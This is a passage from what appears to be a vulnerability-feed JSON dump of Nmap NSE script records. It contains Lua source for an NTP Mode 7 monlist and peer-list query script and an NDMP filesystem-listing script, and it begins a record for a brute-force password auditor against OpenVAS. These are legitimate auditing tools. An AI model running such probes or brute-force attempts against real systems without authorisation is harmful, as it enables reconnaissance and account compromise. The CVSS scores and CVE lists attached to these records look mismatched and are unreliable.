the target.\n--\nfunction doquery(sock, host, port, inum, rcode, records)\n\n local target = ('%s%s%d'):format(\n host.ip, host.ip:match(':') and '.' or ':', port.number\n )\n records.badpkts = records.badpkts or 0\n records.peerlist = records.peerlist or {}\n\n if #records + #records.peerlist >= MAX_RECORDS then\n stdnse.debug1('MAX_RECORDS has been reached for target %s - only processing what we have already!', target)\n if sock then sock:close() end\n return nil\n end\n\n -- connect a new socket if one wasn't supplied\n if not sock then\n sock = nmap.new_socket()\n sock:set_timeout(TIMEOUT)\n local constatus, conerr = sock:connect(host, port)\n if not constatus then\n stdnse.debug1('Error establishing a UDP connection for %s - %s', target, conerr)\n return nil\n end\n end\n\n -- send\n stdnse.debug2('Sending NTPv2 Mode 7 Request %d Implementation %d to %s.', rcode, inum, target)\n local ntpData = getPrivateMode(inum, rcode)\n local sendstatus, senderr = sock:send(ntpData)\n if not sendstatus then\n stdnse.debug1('Error sending NTP request to %s:%d - %s', host.ip, port.number, senderr)\n sock:close()\n return nil\n end\n\n local track = {\n ['evil_pkts'] = records.badpkts, -- a count of bad packets\n ['hseq'] = -1, -- highest received seq number\n ['mseq'] = '|', -- missing seq numbers\n ['errcond'] = false, -- true if sock, ntp or sane response error exists\n ['rcv_again'] = false, -- true if we should receive_bytes again (more bit is set or missing seq).\n ['target'] = target, -- target ip and port\n ['v'] = 2, -- ntp version\n ['m'] = 7, -- ntp mode\n ['c'] = rcode, -- ntp request code\n ['i'] = inum -- ntp request implementation number\n }\n\n -- receive and parse\n repeat\n -- receive any response\n local rcvstatus, response = sock:receive_bytes(1)\n -- check the response\n local packet_to_parse = check(rcvstatus, response, track)\n -- parse the response\n if not track.errcond then\n local remain = parse_v2m7(packet_to_parse, records)\n if remain > 0 then\n stdnse.debug1('MAX_RECORDS has been reached while parsing NTPv2 Mode 7 Code %d responses from the target %s.', rcode, target)\n track.rcv_again = false\n elseif remain == -1 then\n stdnse.debug1('Parsing of NTPv2 Mode 7 implementation number %d request code %d response from %s has not been implemented.', inum, rcode, target)\n track.rcv_again = false\n end\n end\n records.badpkts = records.badpkts + track.evil_pkts\n if records.badpkts >= MAXIMUM_EVIL then\n stdnse.debug1('Had %d bad packets from %s - Not continuing with this host!', target, records.badpkts)\n sock:close()\n return nil\n end\n\n until not track.rcv_again\n\n return sock\n\nend\n\n\n---\n-- Generates an NTP Private Mode (7) request with the supplied implementation\n-- number and request code.\n--\n-- @param impl number - valid values are 0, 2 and 3 - defaults to 3\n-- @param requestCode number - defaults to 42\n-- @return String request.\n--\nfunction getPrivateMode(impl, requestCode)\n local pay\n -- udp payload is 48 bytes.\n -- For a description of Mode 7 packets see NTP source file:\n -- include/ntp_request.h\n --\n -- Flags 8bits: 0x17\n -- (Response Bit: 0, More Bit: 0, Version Number 3bits: 2, Mode 3bits: 7)\n -- Authenticated Bit: 0, Sequence Number 7bits: 0\n -- Implementation Number 8bits: e.g. 0x03 (IMPL_XNTPD)\n -- Request Code 8bits: e.g. 0x2a (MON_GETLIST_1)\n -- Err 4bits: 0, Number of Data Items 12bits: 0\n -- MBZ 4bits: 0, Size of Data Items 12bits: 0\n return string.char(\n 0x17, 0x00, impl or 0x03, requestCode or 0x2a,\n 0x00, 0x00, 0x00, 0x00\n )\n -- Data 40 Octets: 0\n .. (\"\\x00\"):rep(40)\n -- The following are optional if the Authenticated bit is set:\n -- Encryption Keyid 4 Octets: 0\n -- Message Authentication Code 16 Octets (MD5): 0\nend\n\n\n---\n-- Checks that the response from the target is a valid NTP response.\n--\n-- Starts by checking that the socket read was successful and then creates a\n-- packet object from the response (with dummy IP and UDP headers). Then\n-- perform checks that ensure that the response is of the expected type and\n-- length, that the records in the response are of the correct size and that\n-- the response is part of a sequence of 1 or more responses and is not a\n-- duplicate.\n--\n-- @param status boolean returned from a socket read operation.\n-- @param response string response returned from a socket operation.\n-- @param track table used for tracking a sequence of NTP responses.\n-- @return A Packet object ready for parsing or\n-- nil if the response does not pass all checks.\n--\nfunction check(status, response, track)\n\n -- check for socket error\n if not status then\n track.errcond = true\n track.rcv_again = false\n if track.rcv_again then -- we were expecting more responses\n stdnse.debug1('Socket error while reading from %s - %s', track.target, response)\n end\n return nil\n end\n\n -- reset flags\n track.errcond = false\n track.rcv_again = false\n\n -- create a packet object\n local pkt = make_udp_packet(response)\n if pkt == nil then\n track.errcond = true\n track.evil_pkts = track.evil_pkts+1\n stdnse.debug1('Failed to create a Packet object with response from %s', track.target)\n return nil\n end\n\n -- off is the start of udp payload i.e. NTP\n local off = 28\n\n -- NTP sanity checks\n\n local val\n\n -- NTP data must be at least 8 bytes\n val = response:len()\n if val < 8 then\n track.errcond = true\n track.evil_pkts = track.evil_pkts+1\n stdnse.debug1('Expected a response of at least 8 bytes from %s, got %d bytes.', track.target, val)\n return nil\n end\n\n -- response bit set\n if (pkt:u8(off) >> 7) ~= 1 then\n track.errcond = true\n track.evil_pkts = track.evil_pkts+1\n stdnse.debug1('Bad response from %s - did not have response bit set.', track.target)\n return nil\n end\n -- version is as expected\n val = (pkt:u8(off) >> 3) & 0x07\n if val ~= track.v then\n track.errcond = true\n track.evil_pkts = track.evil_pkts+1\n stdnse.debug1('Bad response from %s - expected NTP version %d, got %d', track.target, track.v, val)\n return nil\n end\n -- mode is as expected\n val = pkt:u8(off) & 0x07\n if val ~= track.m then\n track.errcond = true\n track.evil_pkts = track.evil_pkts+1\n stdnse.debug1('Bad response from %s - expected NTP mode %d, got %d', track.target, track.m, val)\n return nil\n end\n -- implementation number is as expected\n val = pkt:u8(off+2)\n if val ~= track.i then\n track.errcond = true\n track.evil_pkts = track.evil_pkts+1\n stdnse.debug1('Bad response from %s - expected NTP implementation number %d, got %d', track.target, track.i, val)\n return nil\n end\n -- request code is as expected\n val = pkt:u8(off+3)\n if val ~= track.c then\n track.errcond = true\n track.evil_pkts = track.evil_pkts+1\n stdnse.debug1('Bad response from %s - expected NTP request code %d got %d.', track.target, track.c, val)\n return nil\n end\n -- NTP error conditions - defined codes are not evil (bogus codes are).\n local fail, msg = false\n local err = (pkt:u8(off+4) >> 4) & 0x0f\n if err == 0 then\n -- NoOp\n elseif err == 1 then\n fail = true\n msg = 'Incompatible Implementation Number'\n elseif err == 2 then\n fail = true\n msg = 'Unimplemented Request Code'\n elseif err == 3 then\n fail = true\n msg = 'Format Error' -- could be that auth is required - we didn't provide it.\n elseif err == 4 then\n fail = true\n msg = 'No Data Available' -- monitor not enabled or nothing in mru list.\n elseif err == 5 or err == 6 then\n fail = true\n msg = 'I don\\'t know'\n elseif err == 7 then\n fail = true\n msg = 'Authentication Failure'\n elseif err > 7 then\n fail = true\n track.evil_pkts = track.evil_pkts+1\n msg = 'Bogus Error Code!' -- should not happen...\n end\n if fail then\n track.errcond = true\n stdnse.debug1('Response from %s was NTP Error Code %d - \"%s\"', track.target, err, msg)\n return nil\n end\n\n -- length checks - the data (number of items * size of an item) should be\n -- 8 <= data <= 500 and each data item should be of correct length for the\n -- implementation and request type.\n\n -- Err 4 bits, Number of Data Items 12 bits\n local icount = pkt:u16(off+4) & 0xFFF\n -- MBZ 4 bits, Size of Data Items: 12 bits\n local isize = pkt:u16(off+6) & 0xFFF\n if icount < 1 then\n track.errcond = true\n track.evil_pkts = track.evil_pkts+1\n stdnse.debug1('Expected at least one record from %s.', track.target)\n return nil\n elseif icount*isize + 8 > response:len() then\n track.errcond = true\n track.evil_pkts = track.evil_pkts+1\n stdnse.debug1('NTP Mode 7 response from %s has invalid count (%d) and/or size (%d) values.', track.target, icount, isize)\n return nil\n elseif icount*isize > 500 then\n track.errcond = true\n track.evil_pkts = track.evil_pkts+1\n stdnse.debug1('NTP Mode 7 data section is larger than 500 bytes (%d) in response from %s.', icount*isize, track.target)\n return nil\n end\n\n if track.c == 42 and track.i == 3 and isize ~= 72 then\n track.errcond = true\n track.evil_pkts = track.evil_pkts+1\n stdnse.debug1(\n 'Expected item size of 72 bytes (got %d) for request code 42 implementation number 3 in response from %s.',\n isize, track.target\n )\n return nil\n elseif track.c == 0 and track.i == 3 and isize ~= 32 then\n track.errcond = true\n track.evil_pkts = track.evil_pkts+1\n stdnse.debug1(\n 'Expected item size of 32 bytes (got %d) for request code 0 implementation number 3 in response from %s.',\n isize, track.target\n )\n return nil\n end\n\n -- is the response out of sequence, a duplicate or is it peachy\n local seq = pkt:u8(off+1) & 0x7f\n if seq == track.hseq+1 then -- all good\n track.hseq = track.hseq+1\n elseif track.mseq:match(('|%d|'):format(seq)) then -- one of our missing seq#\n track.mseq:gsub(('|%d|'):format(seq), '|', 1)\n stdnse.debug3('Response from %s with sequence number %s was previously missing.', -- this never seems to happen!\n track.target, seq\n )\n elseif seq > track.hseq then -- some seq# have gone missing\n for i=track.hseq+1, seq-1 do\n track.mseq = ('%s%d|'):format(track.mseq, i)\n end\n stdnse.debug3(\n 'Response from %s was out of sequence - expected #%d but got #%d (missing:%s)',\n track.target, track.hseq+1, seq, track.mseq\n )\n track.hseq = seq\n else -- seq <= hseq !duplicate!\n track.evil_pkts = track.evil_pkts+1\n stdnse.debug1(\n 'Response from %s had a duplicate sequence number - dropping it.',\n track.target\n )\n return nil\n end\n\n -- if the more bit is set or if we have missing sequence numbers then we'll\n -- want to receive more packets after parsing this one.\n local more = (pkt:u8(off) >> 6) & 0x01\n if more == 1 then\n track.rcv_again = true\n elseif track.mseq:len() > 1 then\n track.rcv_again = true\n end\n\n return pkt\n\nend\n\n\n---\n-- Returns a Packet Object generated with dummy IP and UDP headers and the\n-- supplied UDP payload so that the payload may be conveniently parsed using\n-- packet library methods. The dummy headers contain the barest information\n-- needed to appear valid to packet.lua\n--\n-- @param response String UDP payload.\n-- @return Packet object or nil in case of an error.\n--\nfunction make_udp_packet(response)\n\n -- udp len\n local udplen = 8 + response:len()\n -- ip len\n local iplen = 20 + udplen\n\n -- dummy headers\n -- ip\n local dh = \"\\x45\\x00\" -- IPv4, 20-byte header, no DSCP, no ECN\n .. string.pack('>I2', iplen) -- total length\n .. \"\\x00\\x00\" -- IPID 0\n .. \"\\x40\\x00\" -- DF\n .. \"\\x40\\x11\" -- TTL 0x40, UDP (proto 17)\n .. \"\\x00\\x00\" -- checksum 0\n .. \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" -- Source, destination 0.0.0.0\n .. \"\\x00\\x00\\x00\\x00\" -- UDP source, dest port 0\n .. string.pack('>I2', udplen) -- UDP length\n .. \"\\x00\\x00\" -- UDP checksum 0\n\n return packet.Packet:new(dh .. response, iplen)\n\nend\n\n\n---\n-- Invokes parsing routines for NTPv2 Mode 7 response packets based on the\n-- implementation number and request code defined in the response.\n--\n-- @param pkt Packet Object to be parsed.\n-- @param recs Table to hold the accumulated records parsed from supplied\n-- packet objects.\n-- @return Number of records not parsed from the packet (usually zero) or\n-- -1 if the response does not have an associated parsing routine.\n--\nfunction parse_v2m7(pkt, recs)\n local off = pkt.udp_offset + 8\n local impl = pkt:u8(off+2)\n local code = pkt:u8(off+3)\n if (impl == 3 or impl == 2) and code == 42 then\n return parse_monlist_1(pkt, recs)\n elseif (impl == 3 or impl == 2) and code == 0 then\n return parse_peerlist(pkt, recs)\n else\n return -1\n end\nend\n\n\n---\n-- Parsed records from the supplied monitor list packet into the supplied table\n-- of accumulated records.\n--\n-- The supplied response packets should be NTPv2 Mode 7 implementation number 2\n-- or 3 and request code 42.\n-- The fields parsed are the source and destination IP addresses, the count of\n-- times the target has seen the host, the method of transmission (uni|broad|\n-- multicast), NTP Version and Mode of the last packet received by the target\n-- from the host.\n--\n-- @param pkt Packet object to extract monitor records from.\n-- @param recs A table of accumulated monitor records for storage of parsed\n-- records.\n-- @return Number of records not parsed from the packet which will be zero\n-- except when MAX_RECORDS is reached.\n--\nfunction parse_monlist_1(pkt, recs)\n\n local off = pkt.udp_offset + 8 -- beginning of NTP\n local icount = pkt:u16(off+4) & 0xFFF\n local isize = pkt:u16(off+6) & 0xFFF\n local remaining = icount\n\n off = off+8 -- beginning of data section\n\n for i=1, icount, 1 do\n if #recs + #recs.peerlist >= MAX_RECORDS then\n return remaining\n end\n local pos = off + isize * (i-1) -- beginning of item\n local t = {}\n\n -- src and dst addresses\n -- IPv4 if impl == 2 or v6 flag is not set\n if isize == 32 or pkt:u8(pos+32) ~= 1 then -- IPv4\n local saddr = ipOps.str_to_ip(pkt:raw(pos+16, 4))\n local daddr = ipOps.str_to_ip(pkt:raw(pos+20, 4))\n t.saddr = saddr\n t.daddr = daddr\n else -- IPv6\n local saddr = {}\n for j=40, 54, 2 do\n saddr[#saddr+1] = stdnse.tohex(pkt:u16(pos+j))\n end\n t.saddr = table.concat(saddr, ':')\n local daddr = {}\n for j=56, 70, 2 do\n daddr[#daddr+1] = stdnse.tohex(pkt:u16(pos+j))\n end\n t.daddr = table.concat(daddr, ':')\n end\n\n t.count = pkt:u32(pos+12)\n t.flags = pkt:u32(pos+24)\n -- I've seen flags be wrong-endian just once. why? I really don't know.\n -- Some implementations are not doing htonl for this field?\n if t.flags > 0xFFFFFF then\n -- only concerned with the high order byte\n t.flags = t.flags >> 24\n end\n t.mode = pkt:u8(pos+30)\n t.version = pkt:u8(pos+31)\n recs[#recs+1] = t\n remaining = remaining -1\n end\n\n return remaining\nend\n\n\n---\n-- Parsed records from the supplied peer list packet into the supplied table of\n-- accumulated records.\n--\n-- The supplied response packets should be NTPv2 Mode 7 implementation number 2\n-- or 3 and request code 0.\n-- The fields parsed are the source IP address and the peer information flag.\n--\n-- @param pkt Packet object to extract peer records from.\n-- @param recs A table of accumulated monitor and peer records for storage of\n-- parsed records.\n-- @return Number of records not parsed from the packet which will be zero\n-- except when MAX_RECORDS is reached.\n--\nfunction parse_peerlist(pkt, recs)\n\n local off = pkt.udp_offset + 8 -- beginning of NTP\n local icount = pkt:u16(off+4) & 0xFFF\n local isize = pkt:u16(off+6) & 0xFFF\n local remaining = icount\n\n off = off+8 -- beginning of data section\n\n for i=0, icount-1, 1 do\n if #recs + #recs.peerlist >= MAX_RECORDS then\n return remaining\n end\n local pos = off + (i * isize) -- beginning of item\n local t = {}\n\n -- src address\n -- IPv4 if impl == 2 or v6 flag is not set\n if isize == 8 or pkt:u8(pos+8) ~= 1 then\n local saddr = ipOps.str_to_ip(pkt:raw(pos, 4))\n t.saddr = saddr\n else -- IPv6\n local saddr = {}\n for j=16, 30, 2 do\n saddr[#saddr+1] = stdnse.tohex(pkt:u16(pos+j))\n end\n t.saddr = table.concat(saddr, ':')\n end\n\n t.flags = pkt:u8(pos+7)\n table.insert(recs.peerlist, t)\n remaining = remaining -1\n end\n\n return remaining\nend\n\n\n---\n-- Interprets the supplied records to discover information about the target\n-- NTP associations.\n--\n-- Associations are categorised as NTP Servers, Peers and Clients based on the\n-- Mode of packets sent to the target. Alternative target interfaces are\n-- recorded as well as the transmission mode of packets sent to the target (i.e.\n-- unicast, broadcast or multicast).\n--\n-- @param recs A table of accumulated monitor and peer records for storage\n-- of parsed records.\n-- @param targetip String target IP address (e.g. host.ip)\n-- @return Table of interpreted results with fields such as servs, clients,\n-- peers, ifaces etc.\n--\nfunction interpret(recs, targetip)\n local txtyp = {\n ['1'] = 'unicast',\n ['2'] = 'broadcast',\n ['4'] = 'multicast'\n }\n local t = {}\n t.servs = {['pub']={['4']={},['6']={}}, ['prv']={['4']={},['6']={}}}\n t.peers = {['pub']={['4']={},['6']={}}, ['prv']={['4']={},['6']={}}}\n t.porc = {['pub']={['4']={},['6']={}}, ['prv']={['4']={},['6']={}}}\n t.clients = {['pub']={['4']={},['6']={}}, ['prv']={['4']={},['6']={}}}\n t.casts = {['b']={['4']={},['6']={}}, ['m']={['4']={},['6']={}}}\n t.ifaces = {['4']={},['6']={}}\n t.other = {}\n t.sync = ''\n if #recs.peerlist > 0 then\n t.have_peerlist = true\n recs.peerhash = {}\n for _, peer in ipairs(recs.peerlist) do\n recs.peerhash[peer.saddr] = peer\n end\n else\n t.have_peerlist = false\n end\n\n for _, r in ipairs(recs) do\n local vis = ipOps.isPrivate(r.saddr) and 'prv' or 'pub'\n local af = r.saddr:match(':') and '6' or '4'\n\n -- is the host a client, peer, server or other?\n if r.mode == 3 then\n table.insert(t.clients[vis][af], r.saddr)\n elseif r.mode == 4 then\n table.insert(t.servs[vis][af], r.saddr)\n elseif r.mode == 2 then\n table.insert(t.peers[vis][af], r.saddr)\n elseif r.mode == 1 then\n\n -- if we have a list of peers we can distinguish between mode 1 peers and\n -- mode 1 peers that are really clients (i.e. not configured as peers).\n if t.have_peerlist then\n if recs.peerhash[r.saddr] then\n table.insert(t.peers[vis][af], r.saddr)\n else\n table.insert(t.clients[vis][af], r.saddr)\n end\n else\n table.insert(t.porc[vis][af], r.saddr)\n end\n\n elseif r.mode == 5 then\n table.insert(t.servs[vis][af], r.saddr)\n else\n local tx = tostring(r.flags)\n table.insert(\n t.other,\n ('%s%s seen %d time%s. last tx was %s v%d mode %d'):format(\n r.saddr, _ == 1 and ' (You?)' or '', r.count,\n r.count > 1 and 's' or '',\n txtyp[tx] or tx, r.version, r.mode\n )\n )\n end\n\n local function isLoopback(addr)\n if addr:match(':') then\n if ipOps.compare_ip(addr, 'eq', '::1') then return true end\n elseif addr:match('^127') then\n return true\n end\n return false\n end\n\n -- destination addresses are target interfaces or broad/multicast addresses.\n if not isLoopback(r.daddr) then\n if r.flags == 1 then\n t.ifaces[af][r.daddr] = r.daddr\n elseif r.flags == 2 then\n t.casts.b[af][r.daddr] = r.daddr\n elseif r.flags == 4 then\n t.casts.m[af][r.daddr] = r.daddr\n else -- shouldn't happen\n stdnse.debug1(\n 'Host associated with %s had transmission flag value %d - Strange!',\n targetip, r.flags\n )\n end\n end\n\n end -- for\n\n local function isTarget(addr, target)\n local targ_af = target:match(':') and 6 or 4\n local test_af = addr:match(':') and 6 or 4\n if test_af ~= targ_af then return false end\n if targ_af == 4 and addr == target then return true end\n if targ_af == 6\n and (ipOps.compare_ip(addr, 'eq', target)) then return true end\n return false\n end\n\n -- reorganise ifaces and casts tables\n local _ = {}\n for k, v in pairs(t.ifaces['4']) do\n if not isTarget(v, targetip) then\n _[#_+1] = v\n end\n end\n t.ifaces['4'] = _\n _ = {}\n for k, v in pairs(t.ifaces['6']) do\n if not isTarget(v, targetip) then\n _[#_+1] = v\n end\n end\n t.ifaces['6'] = _\n _ = {}\n for k, v in pairs(t.casts.b['4']) do\n _[#_+1] = v\n end\n t.casts.b['4'] = _\n _ = {}\n for k, v in pairs(t.casts.b['6']) do\n _[#_+1] = v\n end\n t.casts.b['6'] = _\n _ = {}\n for k, v in pairs(t.casts.m['4']) do\n _[#_+1] = v\n end\n t.casts.m['4'] = _\n _ = {}\n for k, v in pairs(t.casts.m['6']) do\n _[#_+1] = v\n end\n t.casts.m['6'] = _\n\n -- Single out the server to which the target is synched.\n -- Note that this server may not even appear in the monlist - it depends how\n -- busy the server is.\n if t.have_peerlist then\n for _, peer in ipairs(recs.peerlist) do\n if (peer.flags & 0x2) == 0x2 then\n t.sync = peer.saddr\n if peer.saddr:match('^127') then -- always IPv4, never IPv6!\n t.sync = t.sync .. ' (reference clock)'\n end\n break\n end\n end\n end\n\n return t\n\nend\n\n\n---\n-- Outputs the supplied table of interpreted records.\n--\n-- @param t Table of interpreted records as returned from interpret().\n-- @return String script output.\n--\nfunction summary(t)\n\n local o = {}\n local count = 0\n local vbs = nmap.verbosity()\n\n -- Target is Synchronised with:\n if t.sync ~= '' then\n table.insert(o, ('Target is synchronised with %s'):format(t.sync))\n end\n\n -- Alternative Target Interfaces\n if #t.ifaces['4'] > 0 or #t.ifaces['6'] > 0 then\n table.insert(o,\n {\n ['name'] = 'Alternative Target Interfaces:',\n output_ips(t.ifaces)\n }\n )\n end\n\n -- Target listens to Broadcast Addresses\n if #t.casts.b['4'] > 0 or #t.casts.b['6'] > 0 then\n table.insert(o,\n {\n ['name'] = 'Target listens to Broadcast Addresses:',\n output_ips(t.casts.b)\n }\n )\n end\n\n -- Target listens to Multicast Addresses\n if #t.casts.m['4'] > 0 or #t.casts.m['6'] > 0 then\n table.insert(o,\n {\n ['name'] = 'Target listens to Multicast Addresses:',\n output_ips(t.casts.m)\n }\n )\n end\n\n -- Private Servers\n count = #t.servs.prv['4']+#t.servs.prv['6']\n if count > 0 or vbs > 1 then\n table.insert(o,\n {\n ['name'] = ('Private Servers (%d)'):format(count),\n output_ips(t.servs.prv)\n }\n )\n end\n -- Public Servers\n count = #t.servs.pub['4']+#t.servs.pub['6']\n if count > 0 or vbs > 1 then\n table.insert(o,\n {\n ['name'] = ('Public Servers (%d)'):format(count),\n output_ips(t.servs.pub)\n }\n )\n end\n\n -- Private Peers\n count = #t.peers.prv['4']+#t.peers.prv['6']\n if count > 0 or vbs > 1 then\n table.insert(o,\n {\n ['name'] = ('Private Peers (%d)'):format(count),\n output_ips(t.peers.prv)\n }\n )\n end\n -- Public Peers\n count = #t.peers.pub['4']+#t.peers.pub['6']\n if count > 0 or vbs > 1 then\n table.insert(o,\n {\n ['name'] = ('Public Peers (%d)'):format(count),\n output_ips(t.peers.pub)\n }\n )\n end\n\n -- Private Peers or Clients\n count = #t.porc.prv['4']+#t.porc.prv['6']\n if not t.have_peerlist and (count > 0 or vbs > 1) then\n table.insert(o,\n {\n ['name'] = ('Private Peers or Clients (%d)'):format(count),\n output_ips(t.porc.prv)\n }\n )\n end\n -- Public Peers or Clients\n count = #t.porc.pub['4']+#t.porc.pub['6']\n if not t.have_peerlist and (count > 0 or vbs > 1) then\n table.insert(o,\n {\n ['name'] = ('Public Peers or Clients (%d)'):format(count),\n output_ips(t.porc.pub)\n }\n )\n end\n\n -- Private Clients\n count = #t.clients.prv['4']+#t.clients.prv['6']\n if count > 0 or vbs > 1 then\n table.insert(o,\n {\n ['name'] = ('Private Clients (%d)'):format(count),\n output_ips(t.clients.prv)\n }\n )\n end\n -- Public Clients\n count = #t.clients.pub['4']+#t.clients.pub['6']\n if count > 0 or vbs > 1 then\n table.insert(o,\n {\n ['name'] = ('Public Clients (%d)'):format(count),\n output_ips(t.clients.pub)\n }\n )\n end\n\n -- Other\n count = #t.other\n if count > 0 then\n table.insert(o,\n {\n ['name'] = ('Other Associations (%d)'):format(count),\n t.other\n }\n )\n end\n\n return stdnse.format_output(true, o)\n\nend\n\n\n---\n-- Sorts and combines a set of IPv4 and IPv6 addresses into a table of rows.\n-- IPv4 addresses are ascending-sorted numerically and arranged in four columns\n-- and IPv6 appear in subsequent rows, sorted and arranged to fit as many\n-- addresses into a row as possible without the need for wrapping.\n--\n-- @param t Table containing two subtables indexed as '4' and '6' containing\n-- a list of IPv4 and IPv6 addresses respectively.\n-- @return Table where each entry is a row of sorted and arranged IP addresses.\n--\nfunction output_ips(t)\n\n if #t['4'] < 1 and #t['6'] < 1 then return nil end\n\n local o = {}\n\n -- sort and tabulate IPv4 addresses\n table.sort(t['4'], function(a,b) return ipOps.compare_ip(a, \"lt\", b) end)\n local limit = #t['4']\n local cols = 4\n local rows = math.ceil(limit/cols)\n local numlast = limit - cols*rows + cols\n local pad4 = (' '):rep(15)\n local index = 0\n for c=1, cols, 1 do\n for r=1, rows, 1 do\n if r == rows and c > numlast then break end\n index = index+1\n o[r] = o[r] or ''\n local padlen = pad4:len() - t['4'][index]:len()\n o[r] = ('%s%s%s '):format(o[r], t['4'][index], pad4:sub(1, padlen))\n end\n end\n\n -- IPv6\n -- Rows are allowed to be 71 chars wide\n table.sort(t['6'], function(a,b) return ipOps.compare_ip(a, \"lt\", b) end)\n local i = 1\n local limit = #t['6']\n while i <= limit do\n local work = {}\n local len = 0\n local j = i\n repeat\n if not t['6'][j] then j = j-1; break end\n len = len + t['6'][j]:len() + 1\n if len > 71 then\n j = j-1\n else\n j = j+1\n end\n until len > 71\n for n = i, j, 1 do\n work[#work+1] = t['6'][n]\n end\n o[#o+1] = table.concat(work, ' ')\n i = j+1\n end\n return o\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:40:54", "description": "Lists remote file systems by querying the remote device using the Network Data Management Protocol (ndmp). NDMP is a protocol intended to transport data between a NAS device and the backup device, removing the need for the data to pass through the backup server. The following products are known to support the protocol: \n\n * Amanda \n * Bacula \n * CA Arcserve \n * CommVault Simpana \n * EMC Networker \n * Hitachi Data Systems \n * IBM Tivoli \n * Quest Software Netvault Backup \n * Symantec Netbackup \n * Symantec Backup Exec\n\n## Example Usage \n \n \n nmap -p 10000 --script ndmp-fs-info <ip>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON VERSION\n 10000/tcp open ndmp syn-ack Symantec/Veritas Backup Exec ndmp\n | ndmp-fs-info:\n | FS Logical device Physical device\n | NTFS C: Device0000\n | NTFS E: Device0000\n | UNKNOWN Shadow Copy Components Device0000\n |_UNKNOWN System State Device0000\n \n \n\n## Requires \n\n * [ndmp](<../lib/ndmp.html>)\n * [shortport](<../lib/shortport.html>)\n * [tab](<../lib/tab.html>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-02-19T14:56:17", "type": "nmap", "title": "ndmp-fs-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-07-28T16:06:18", "id": "NMAP:NDMP-FS-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/ndmp-fs-info.html", "sourceData": "local ndmp = require \"ndmp\"\nlocal shortport = require \"shortport\"\nlocal tab = require \"tab\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nLists remote file systems by querying the remote device using the Network\nData Management Protocol (ndmp). NDMP is a protocol intended to transport\ndata between a NAS device and the backup device, removing the need for the\ndata to pass through the backup server. The following products are known\nto support the protocol:\n* Amanda\n* Bacula\n* CA Arcserve\n* CommVault Simpana\n* EMC Networker\n* Hitachi Data Systems\n* IBM Tivoli\n* Quest Software Netvault Backup\n* Symantec Netbackup\n* Symantec Backup Exec\n]]\n\n---\n-- @usage\n-- nmap -p 10000 --script ndmp-fs-info <ip>\n--\n-- @output\n-- PORT STATE SERVICE REASON VERSION\n-- 10000/tcp open ndmp syn-ack Symantec/Veritas Backup Exec ndmp\n-- | ndmp-fs-info:\n-- | FS Logical device Physical device\n-- | NTFS C: Device0000\n-- | NTFS E: Device0000\n-- | UNKNOWN Shadow Copy Components Device0000\n-- |_UNKNOWN System State Device0000\n--\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\n\nportrule = shortport.port_or_service(10000, \"ndmp\", \"tcp\")\n\nlocal function fail(err) return stdnse.format_output(false, err) end\n\naction = function(host, port)\n\n local helper = ndmp.Helper:new(host, port)\n local status, msg = helper:connect()\n if ( not(status) ) then return fail(\"Failed to connect to server\") end\n\n status, msg = helper:getFsInfo()\n if ( not(status) ) then return fail(\"Failed to get filesystem information from server\") end\n if ( msg.header.error == ndmp.NDMP.ErrorType.NOT_AUTHORIZED_ERROR ) then return fail(\"Not authorized to get filesystem information from server\") end\n helper:close()\n\n local result = tab.new(3)\n tab.addrow(result, \"FS\", \"Logical device\", \"Physical device\")\n\n for _, item in ipairs(msg.fsinfo) do\n if ( item.fs_logical_device and #item.fs_logical_device ~= 0 ) then\n if ( item and item.fs_type and item.fs_logical_device and item.fs_physical_device ) then\n tab.addrow(result, item.fs_type, item.fs_logical_device:gsub(\"?\", \" \"), item.fs_physical_device)\n end\n end\n end\n\n return \"\\n\" .. tab.dump(result)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:39:29", "description": "Performs brute force password auditing against the OpenVAS manager using OMPv2.\n\n## Script Arguments \n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee the documentation for the [brute](<../lib/brute.html#script-args>) library. \n\n#### omp2.password, omp2.username \n\nSee the documentation for the [omp2](<../lib/omp2.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 9390 --script omp2-brute <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 9390/tcp open openvas syn-ack\n | omp2-brute:\n | Accounts\n |_ admin:secret => Valid credentials\n \n\n## Requires \n\n * [brute](<../lib/brute.html>)\n * [creds](<../lib/creds.html>)\n * [omp2](<../lib/omp2.html>)\n * 